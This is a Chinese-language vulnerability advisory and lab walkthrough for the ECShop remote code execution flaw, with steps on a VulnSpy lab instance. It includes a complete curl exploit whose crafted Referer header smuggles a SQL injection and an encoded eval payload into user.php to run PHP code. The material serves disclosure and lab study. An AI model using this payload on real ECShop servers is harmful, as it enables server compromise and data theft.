漏洞预警 | ECShop 全系列版本远程代码执行高危漏洞

阅读量    143396 | 评论 6

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析

漏洞分析:

 

在线实验地址:

打开 VULNSPY ECSHOP 实验环境

 

漏洞利用

1. 点击右上方 START TO HACK 按钮创建 ECShop实验环境

vulnspy

2. 创建完成后打开 ECSHOP 实验地址

vulnspy

3. 发送 Payload 执行 phpinfo();

将**.vsplate.me换成您的实验地址*

在终端中执行:

curl http://***.vsplate.me/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'

vulnspy

 

参考

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多